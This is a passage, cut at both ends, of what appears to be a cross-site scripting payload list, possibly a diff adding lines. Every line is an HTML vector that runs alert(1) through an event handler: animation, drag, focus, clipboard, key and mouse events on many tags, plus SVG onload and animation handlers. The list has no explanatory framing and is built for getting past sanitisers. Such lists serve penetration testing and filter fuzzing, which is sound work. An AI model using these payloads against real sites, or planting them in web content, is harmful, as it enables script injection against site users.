onanimationstart="alert(1)"></image> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> +<sub draggable="true" ondrag="alert(1)">test</sub> +<sub draggable="true" ondragend="alert(1)">test</sub> +<sub draggable="true" ondragenter="alert(1)">test</sub> +<sub draggable="true" ondragleave="alert(1)">test</sub> +<sub draggable="true" ondragstart="alert(1)">test</sub> +<sub id=x tabindex=1 onactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> +<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> +<sub id=x tabindex=1 onfocus=alert(1)></sub> +<sub id=x tabindex=1 onfocusin=alert(1)></sub> +<sub onbeforecopy="alert(1)" contenteditable>test</sub> +<sub onbeforecut="alert(1)" contenteditable>test</sub> +<sub onbeforepaste="alert(1)" contenteditable>test</sub> +<sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onclick="alert(1)">test</sub> +<sub oncontextmenu="alert(1)">test</sub> +<sub oncopy="alert(1)" contenteditable>test</sub> +<sub oncut="alert(1)" contenteditable>test</sub> +<sub ondblclick="alert(1)">test</sub> +<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onkeydown="alert(1)" contenteditable>test</sub> +<sub onkeypress="alert(1)" contenteditable>test</sub> +<sub onkeyup="alert(1)" contenteditable>test</sub> +<sub onmousedown="alert(1)">test</sub> +<sub onmouseenter="alert(1)">test</sub> +<sub onmouseleave="alert(1)">test</sub> +<sub onmousemove="alert(1)">test</sub> +<sub onmouseout="alert(1)">test</sub> +<sub onmouseover="alert(1)">test</sub> +<sub onmouseup="alert(1)">test</sub> +<sub onpaste="alert(1)" contenteditable>test</sub> +<summary draggable="true" ondrag="alert(1)">test</summary> +<summary draggable="true" ondragend="alert(1)">test</summary> +<summary draggable="true" ondragenter="alert(1)">test</summary> +<summary draggable="true" ondragleave="alert(1)">test</summary> +<summary draggable="true" ondragstart="alert(1)">test</summary> +<summary id=x tabindex=1 onactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus> +<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> +<summary id=x tabindex=1 onfocus=alert(1)></summary> +<summary id=x tabindex=1 onfocusin=alert(1)></summary> +<summary onbeforecopy="alert(1)" contenteditable>test</summary> +<summary onbeforecut="alert(1)" contenteditable>test</summary> +<summary onbeforepaste="alert(1)" contenteditable>test</summary> +<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onclick="alert(1)">test</summary> +<summary oncontextmenu="alert(1)">test</summary> +<summary oncopy="alert(1)" contenteditable>test</summary> +<summary oncut="alert(1)" contenteditable>test</summary> +<summary ondblclick="alert(1)">test</summary> +<summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onkeydown="alert(1)" contenteditable>test</summary> +<summary onkeypress="alert(1)" contenteditable>test</summary> +<summary onkeyup="alert(1)" contenteditable>test</summary> +<summary onmousedown="alert(1)">test</summary> +<summary onmouseenter="alert(1)">test</summary> +<summary onmouseleave="alert(1)">test</summary> +<summary onmousemove="alert(1)">test</summary> +<summary onmouseout="alert(1)">test</summary> +<summary onmouseover="alert(1)">test</summary> +<summary onmouseup="alert(1)">test</summary> +<summary onpaste="alert(1)" contenteditable>test</summary> +<sup draggable="true" ondrag="alert(1)">test</sup> +<sup draggable="true" ondragend="alert(1)">test</sup> +<sup draggable="true" ondragenter="alert(1)">test</sup> +<sup draggable="true" ondragleave="alert(1)">test</sup> +<sup draggable="true" ondragstart="alert(1)">test</sup> +<sup id=x tabindex=1 onactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> +<sup id=x tabindex=1 onfocus=alert(1)></sup> +<sup id=x tabindex=1 onfocusin=alert(1)></sup> +<sup onbeforecopy="alert(1)" contenteditable>test</sup> +<sup onbeforecut="alert(1)" contenteditable>test</sup> +<sup onbeforepaste="alert(1)" contenteditable>test</sup> +<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onclick="alert(1)">test</sup> +<sup oncontextmenu="alert(1)">test</sup> +<sup oncopy="alert(1)" contenteditable>test</sup> +<sup oncut="alert(1)" contenteditable>test</sup> +<sup ondblclick="alert(1)">test</sup> +<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onkeydown="alert(1)" contenteditable>test</sup> +<sup onkeypress="alert(1)" contenteditable>test</sup> +<sup onkeyup="alert(1)" contenteditable>test</sup> +<sup onmousedown="alert(1)">test</sup> +<sup onmouseenter="alert(1)">test</sup> +<sup onmouseleave="alert(1)">test</sup> +<sup onmousemove="alert(1)">test</sup> +<sup onmouseout="alert(1)">test</sup> +<sup onmouseover="alert(1)">test</sup> +<sup onmouseup="alert(1)">test</sup> +<sup onpaste="alert(1)" contenteditable>test</sup> +<svg draggable="true" ondrag="alert(1)">test</svg> +<svg draggable="true" ondragend="alert(1)">test</svg> +<svg draggable="true" ondragenter="alert(1)">test</svg> +<svg draggable="true" ondragleave="alert(1)">test</svg> +<svg draggable="true" ondragstart="alert(1)">test</svg> +<svg id=x onfocus=alert(1)> +<svg id=x onfocusin=alert(1)> +<svg id=x tabindex=1 onactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> +<svg onbeforecopy="alert(1)" contenteditable>test</svg> +<svg onbeforecut="alert(1)" contenteditable>test</svg> +<svg onbeforepaste="alert(1)" contenteditable>test</svg> +<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onclick="alert(1)">test</svg> +<svg oncontextmenu="alert(1)">test</svg> +<svg oncopy="alert(1)" contenteditable>test</svg> +<svg oncut="alert(1)" contenteditable>test</svg> +<svg ondblclick="alert(1)">test</svg> +<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onkeydown="alert(1)" contenteditable>test</svg> +<svg onkeypress="alert(1)" contenteditable>test</svg> +<svg onkeyup="alert(1)" contenteditable>test</svg> +<svg onload=alert(1)> +<svg onmousedown="alert(1)">test</svg> +<svg onmouseenter="alert(1)">test</svg> +<svg onmouseleave="alert(1)">test</svg> +<svg onmousemove="alert(1)">test</svg> +<svg onmouseout="alert(1)">test</svg> +<svg onmouseover="alert(1)">test</svg> +<svg onmouseup="alert(1)">test</svg> +<svg onpaste="alert(1)" contenteditable>test</svg> +<svg onunload=window.open('javascript:alert(1)')> +<svg><a onload=alert(1)></a> +<svg><abbr onload=alert(1)></abbr> +<svg><acronym onload=alert(1)></acronym> +<svg><address onload=alert(1)></address> +<svg><animate onbegin=alert(1) attributeName=x dur=1s> +<svg><animate onend=alert(1) attributeName=x dur=1s> +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> +<svg><animatetransform onbegin=alert(1) attributeName=transform> +<svg><animatetransform onend=alert(1) attributeName=transform dur=1s> +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> +<svg><applet onload=alert(1)></applet> +<svg><area onload=alert(1)></area> +<svg><article onload=alert(1)></article> +<svg><aside onload=alert(1)></aside> +<svg><audio onload=alert(1)></audio> +<svg><b onload=alert(1)></b> +<svg><base onload=alert(1)></base> +<svg><basefont onload=alert(1)></basefont> +<svg><bdi onload=alert(1)></bdi> +<svg><bdo onload=alert(1)></bdo> +<svg><bgsound onload=alert(1)></bgsound> +<svg><big onload=alert(1)></big> +<svg><blink onload=alert(1)></blink> +<svg><blockquote onload=alert(1)></blockquote> +<svg><br onload=alert(1)></br> +<svg><button onload=alert(1)></button> +<svg><canvas onload=alert(1)></canvas> +<svg><caption onload=alert(1)></caption> +<svg><center onload=alert(1)></center> +<svg><cite onload=alert(1)></cite> +<svg><code onload=alert(1)></code> +<svg><col onload=alert(1)></col> +<svg><colgroup onload=alert(1)></colgroup> +<svg><command onload=alert(1)></command> +<svg><content onload=alert(1)></content> +<svg><data onload=alert(1)></data> +<svg><datalist onload=alert(1)></datalist> +<svg><dd onload=alert(1)></dd> +<svg><del onload=alert(1)></del> +<svg><details onload=alert(1)></details> +<svg><dfn onload=alert(1)></dfn> +<svg><dialog onload=alert(1)></dialog> +<svg><dir onload=alert(1)></dir> +<svg><discard onbegin=alert(1)> +<svg><div onload=alert(1)></div> +<svg><dl onload=alert(1)></dl> +<svg><dt onload=alert(1)></dt> +<svg><element onload=alert(1)></element> +<svg><em onload=alert(1)></em> +<svg><fieldset onload=alert(1)></fieldset> +<svg><figcaption onload=alert(1)></figcaption> +<svg><figure onload=alert(1)></figure> +<svg><font onload=alert(1)></font> +<svg><footer onload=alert(1)></footer> +<svg><form onload=alert(1)></form> +<svg><frameset onload=alert(1)></frameset> +<svg><h1 onload=alert(1)></h1> +<svg><head onload=alert(1)></head> +<svg><header onload=alert(1)></header> +<svg><hgroup onload=alert(1)></hgroup> +<svg><hr onload=alert(1)></hr> +<svg><html onload=alert(1)></html> +<svg><i onload=alert(1)></i> +<svg><image href=1 onerror=alert(1)> +<svg><image href=validimage.png onload=alert(1)> +<svg><ins onload=alert(1)></ins> +<svg><kbd onload=alert(1)></kbd> +<svg><keygen onload=alert(1)></keygen> +<svg><label onload=alert(1)></label> +<svg><legend onload=alert(1)></legend> +<svg><li onload=alert(1)></li> +<svg><listing onload=alert(1)></listing> +<svg><main onload=alert(1)></main> +<svg><map onload=alert(1)></map> +<svg><mark onload=alert(1)></mark> +<svg><marquee onload=alert(1)></marquee> +<svg><menu onload=alert(1)></menu> +<svg><menuitem onload=alert(1)></menuitem> +<svg><meta onload=alert(1)></meta> +<svg><meter onload=alert(1)></meter> +<svg><multicol onload=alert(1)></multicol> +<svg><nav onload=alert(1)></nav> +<svg><nextid onload=alert(1)></nextid> +<svg><nobr onload=alert(1)></nobr> +<svg><noembed onload=alert(1)></noembed> +<svg><noframes onload=alert(1)></noframes> +<svg><noscript onload=alert(1)></noscript> +<svg><ol onload=alert(1)></ol> +<svg><optgroup onload=alert(1)></optgroup> +<svg><option onload=alert(1)></option> +<svg><output onload=alert(1)></output> +<svg><p onload=alert(1)></p> +<svg><param onload=alert(1)></param> +<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> +<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> +<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> +<svg><picture onload=alert(1)></picture> +<svg><plaintext onload=alert(1)></plaintext> +<svg><pre onload=alert(1)></pre> +<svg><progress onload=alert(1)></progress> +<svg><q onload=alert(1)></q> +<svg><rb onload=alert(1)></rb> +<svg><rp onload=alert(1)></rp> +<svg><rt onload=alert(1)></rt> +<svg><rtc onload=alert(1)></rtc> +<svg><ruby onload=alert(1)></ruby> +<svg><s onload=alert(1)></s> +<svg><samp onload=alert(1)></samp> +<svg><section onload=alert(1)></section> +<svg><select onload=alert(1)></select> +<svg><set onbegin=alert(1) attributename=x dur=1s> +<svg><set onend=alert(1) attributename=x dur=1s> +<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> +<svg><shadow onload=alert(1)></shadow> +<svg><slot onload=alert(1)></slot> +<svg><small onload=alert(1)></small> +<svg><source onload=alert(1)></source> +<svg><spacer onload=alert(1)></spacer> +<svg><span onload=alert(1)></span> +<svg><strike onload=alert(1)></strike> +<svg><strong onload=alert(1)></strong> +<svg><sub onload=alert(1)></sub> +<svg><summary onload=alert(1)></summary> +<svg><sup onload=alert(1)></sup> +<svg><table onload=alert(1)></table> +<svg><tbody onload=alert(1)></tbody> +<svg><td onload=alert(1)></td> +<svg><template onload=alert(1)></template> +<svg><textarea onload=alert(1)></textarea> +<svg><tfoot onload=alert(1)></tfoot> +<svg><th onload=alert(1)></th> +<svg><thead onload=alert(1)></thead> +<svg><time onload=alert(1)></time> +<svg><title onload=alert(1)></title> +<svg><tr onload=alert(1)></tr> +<svg><tt onload=alert(1)></tt> +<svg><u onload=alert(1)></u> +<svg><ul onload=alert(1)></ul> +<svg><var onload=alert(1)></var> +<svg><video onload=alert(1)></video> +<svg><wbr onload=alert(1)></wbr> +<svg><xmp onload=alert(1)></xmp> +<svg><xss onload=alert(1)></xss> +<table draggable="true" ondrag="alert(1)">test</table> +<table draggable="true" ondragend="alert(1)">test</table> +<table draggable="true" ondragenter="alert(1)">test</table> +<table draggable="true" ondragleave="alert(1)">test</table> +<table draggable="true" ondragstart="alert(1)">test</table> +<table id=x tabindex=1 onactivate=alert(1)></table> +<table id=x tabindex=1 onbeforeactivate=alert(1)></table> +<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> +<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> +<table id=x tabindex=1 onfocus=alert(1)></table> +<table id=x tabindex=1 onfocusin=alert(1)></table> +<table onbeforecopy="alert(1)" contenteditable>test</table> +<table onbeforecut="alert(1)" contenteditable>test</table> +<table onbeforepaste="alert(1)" contenteditable>test</table> +<table onblur=alert(1) tabindex=1 id=x></table><input autofocus> +<table onclick="alert(1)">test</table> +<table oncontextmenu="alert(1)">test</table> +<table oncopy="alert(1)" contenteditable>test</table> +<table oncut="alert(1)" contenteditable>test</table> +<table ondblclick="alert(1)">test</table> +<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> +<table onkeydown="alert(1)" contenteditable>test</table> +<table onkeypress="alert(1)" contenteditable>test</table> +<table onkeyup="alert(1)" contenteditable>test</table> +<table onmousedown="alert(1)">test</table> +<table onmouseenter="alert(1)">test</table> +<table onmouseleave="alert(1)">test</table> +<table onmousemove="alert(1)">test</table> +<table onmouseout="alert(1)">test</table> +<table onmouseover="alert(1)">test</table> +<table onmouseup="alert(1)">test</table> +<table onpaste="alert(1)" contenteditable>test</table> +<tbody draggable="true" ondrag="alert(1)">test</tbody> +<tbody draggable="true" ondragend="alert(1)">test</tbody> +<tbody draggable="true" ondragenter="alert(1)">test</tbody> +<tbody draggable="true" ondragleave="alert(1)">test</tbody> +<tbody draggable="true" ondragstart="alert(1)">test</tbody> +<tbody id=x tabindex=1 onactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus> +<tbody id=x tabindex=1 onfocus=alert(1)></tbody> +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody> +<tbody onbeforecopy="alert(1)" contenteditable>test</tbody> +<tbody onbeforecut="alert(1)" contenteditable>test</tbody> +<tbody onbeforepaste="alert(1)" contenteditable>test</tbody> +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onclick="alert(1)">test</tbody> +<tbody oncontextmenu="alert(1)">test</tbody> +<tbody oncopy="alert(1)" contenteditable>test</tbody> +<tbody oncut="alert(1)" contenteditable>test</tbody> +<tbody ondblclick="alert(1)">test</tbody> +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onkeydown="alert(1)" contenteditable>test</tbody> +<tbody onkeypress="alert(1)" contenteditable>test</tbody> +<tbody onkeyup="alert(1)" contenteditable>test</tbody> +<tbody onmousedown="alert(1)">test</tbody> +<tbody onmouseenter="alert(1)">test</tbody> +<tbody onmouseleave="alert(1)">test</tbody> +<tbody onmousemove="alert(1)">test</tbody> +<tbody onmouseout="alert(1)">test</tbody> +<tbody onmouseover="alert(1)">test</tbody> +<tbody onmouseup="alert(1)">test</tbody> +<tbody onpaste="alert(1)" contenteditable>test</tbody> +<td draggable="true" ondrag="alert(1)">test</td> +<td draggable="true" ondragend="alert(1)">test</td> +<td draggable="true" ondragenter="alert(1)">test</td> +<td draggable="true" ondragleave="alert(1)">test</td> +<td draggable="true" 